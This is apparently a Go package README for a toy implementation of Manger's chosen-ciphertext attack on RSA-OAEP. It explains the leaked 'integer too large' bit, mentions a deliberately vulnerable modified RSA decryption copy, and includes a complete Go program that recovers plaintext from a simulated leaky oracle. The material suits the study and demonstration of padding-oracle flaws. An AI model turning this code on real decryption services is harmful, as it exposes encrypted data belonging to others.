go-manger-attack

module v0.0.0-...-5424261
Published: Feb 5, 2018 License: CC0-1.0

README

go-manger-attack

This is a toy implementation in Go of the well-known chosen-ciphertext attack against RSA-OAEP found by Manger.

James Manger showed (CRYPTO 2001) that, although RSA-OAEP is provably secure as a scheme, typical implementations of PKCS #1 v2.0 decoding leaked one bit per decryption: whether the decrypted integer was at least B = 2^(8(k-1)), where k is the byte length of the modulus (the "integer too large" check that runs before the OAEP unpadding). If that condition can be told apart from the other decoding failures, by a distinct error code or by a timing difference, an attacker holding a ciphertext can submit adaptively chosen multiples of it and recover the plaintext with roughly log2(n) oracle queries, on the order of 1,100 for a 1024-bit modulus. The principle is relatively simple; the fix is equally simple in principle, all decoding failures must be indistinguishable to the caller, and surprisingly hard to get right in practice.

The present repo is an implementation of that attack in Go, run against a modified, deliberately vulnerable copy of the RSA-OAEP decryption function rather than the one from the crypto/rsa package. The current crypto/rsa package implementation may have a timing discrepancy in the leftPad function which could lead to a Manger attack, but if it does, the signal is too low to be exploitable, even locally (according to my benchmarks).

To test it

You can use the modded RSA library I included to test the code by simply running:

go test -v ./mangerattack -run TestOracleWithModdedRSA

To use it with your own oracle

You can call this as a package and pass your own oracle to the MangerAttack(Oracle) function. Your type must satisfy the package's Oracle interface: a Decrypt(*big.Int) method that submits the given integer to your oracle as a ciphertext, and a Query() bool method that returns the oracle's verdict on that submission: true when the decrypted integer is >= B (its k-byte encoding has no leading zero byte), false when it is < B (one or more leading zero bytes after decryption). Here B = 2^(8(k-1)) with k the byte length of the modulus; it is the bound the PKCS #1 v2.0 decoding step checks before unpadding, and that single bit per query is all the attack needs.

An example is provided in attack_test.go, written as an external ("blackbox") test package, that shows how to implement the interface.
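As an added, self-contained illustration (example code written for this page, not code from this repository), the following Go program implements the three steps of Manger's algorithm against a constructed leaky oracle that exposes the Decrypt/Query shape described above. The Oracle and ToyOracle types, the Manger function and RecoverRandomMessage are assumptions made for this example and are not this package's MangerAttack; the repository's exact signatures are in attack_test.go. The key is a real crypto/rsa key, so only the oracle is the toy part: it returns the ">= B" bit directly instead of leaking it through an error code or timing.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"fmt"
	"math/big"
)

var one = big.NewInt(1)

// Oracle mirrors the two-method shape the README describes (names assumed here).
type Oracle interface {
	Decrypt(*big.Int) // submit an integer as a ciphertext
	Query() bool      // was the last decrypted integer >= B?
}

// ToyOracle is a constructed leaky decoder: it leaks exactly the bit Manger needs.
type ToyOracle struct {
	n, d, B *big.Int
	last    bool
	Queries int
}

func (o *ToyOracle) Decrypt(c *big.Int) {
	o.last = new(big.Int).Exp(c, o.d, o.n).Cmp(o.B) >= 0 // nonzero leading byte?
	o.Queries++
}

func (o *ToyOracle) Query() bool { return o.last }

func ceilDiv(a, b *big.Int) *big.Int {
	q, r := new(big.Int).QuoRem(a, b, new(big.Int))
	if r.Sign() != 0 {
		q.Add(q, one)
	}
	return q
}

// Manger recovers m = c^d mod n via the three steps of Manger's 2001 paper. Assumes 0 < m < B
// and 2B < n (any valid OAEP ciphertext); returns nil if the oracle is inconsistent (noisy timing).
func Manger(o Oracle, n, e, c *big.Int) *big.Int {
	B := new(big.Int).Lsh(one, uint(8*((n.BitLen()+7)/8-1))) // B = 2^(8(k-1))
	ask := func(f *big.Int) bool { // f^e*c mod n decrypts to f*m mod n
		fe := new(big.Int).Exp(f, e, n)
		o.Decrypt(fe.Mul(fe, c).Mod(fe, n))
		return o.Query()
	}
	// Step 1: double f1 until f1*m >= B, so f1*m lands in [B, 2B).
	f1 := big.NewInt(2)
	for !ask(f1) {
		f1.Lsh(f1, 1)
	}
	// Step 2: half*m in [B/2, B); add half until f2*m wraps just past n into [n, n+B).
	half := new(big.Int).Rsh(f1, 1)
	f2 := new(big.Int).Mul(new(big.Int).Quo(new(big.Int).Add(n, B), B), half)
	for ask(f2) {
		f2.Add(f2, half)
	}
	mmin := ceilDiv(n, f2)
	mmax := new(big.Int).Quo(new(big.Int).Add(n, B), f2)
	// Step 3: f3*m lies in [i*n, i*n+2B); the oracle tells which side of i*n+B, halving the range.
	for iter := 0; mmin.Cmp(mmax) < 0; iter++ {
		if iter > 8*n.BitLen() {
			return nil
		}
		ftmp := new(big.Int).Quo(new(big.Int).Lsh(B, 1), new(big.Int).Sub(mmax, mmin))
		i := new(big.Int).Quo(new(big.Int).Mul(ftmp, mmin), n)
		in := new(big.Int).Mul(i, n)
		f3 := ceilDiv(in, mmin)
		inB := in.Add(in, B)
		if ask(f3) {
			mmin = ceilDiv(inB, f3) // f3*m >= i*n + B
		} else {
			mmax = inB.Sub(inB, one).Quo(inB, f3) // f3*m <= i*n + B - 1
		}
	}
	return mmin
}

// RecoverRandomMessage encrypts a random m < B under a fresh key, runs the
// attack and checks the result as an attacker would: by re-encrypting it.
func RecoverRandomMessage(bits int) (recovered bool, queries int) {
	key, err := rsa.GenerateKey(rand.Reader, bits) // real key; only the oracle is toy
	if err != nil {
		panic(err)
	}
	n, e := key.N, big.NewInt(int64(key.E))
	B := new(big.Int).Lsh(one, uint(8*((n.BitLen()+7)/8-1)))
	m, _ := rand.Int(rand.Reader, B)
	c := new(big.Int).Exp(m, e, n)
	o := &ToyOracle{n: n, d: key.D, B: B}
	got := Manger(o, n, e, c)
	ok := got != nil && new(big.Int).Exp(got, e, n).Cmp(c) == 0 && got.Cmp(m) == 0
	return ok, o.Queries
}

func main() {
	ok, q := RecoverRandomMessage(1024)
	fmt.Printf("plaintext recovered: %v after %d oracle queries\n", ok, q)
}
```

Two details matter when adapting this to a real oracle. The false branch in step 3 uses the strict bound floor((i*n + B - 1)/f3), which is what "f3*m mod n < B" actually implies; together with the observation that i >= 2 holds from the first round on, this guarantees the interval shrinks on every query, so the loop cannot stall. The iteration cap exists for the case the README itself raises: a timing oracle whose signal is too weak to read reliably will return wrong bits, the interval bounds then become unsound, and without the cap the search could run indefinitely. Re-encrypting the candidate under the public key is the attacker's own correctness check and costs nothing.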

Intellectual property

Copyright (c) 2016 Nagravision SA, all rights are reserved.

rsa.go and parts of utils.go are copyright The Go Authors, with modifications copyright Nagravision SA.

Directories

Path Synopsis
(path not captured) Modified copies of some of the code from the Go crypto package; all credit goes to The Go Authors. It follows a BSD-style licence that can be found in the GO_LICENSE file.
(path not captured) Its purpose is to demonstrate that the current crypto/rsa library is at least partially vulnerable to Manger attacks, cf.
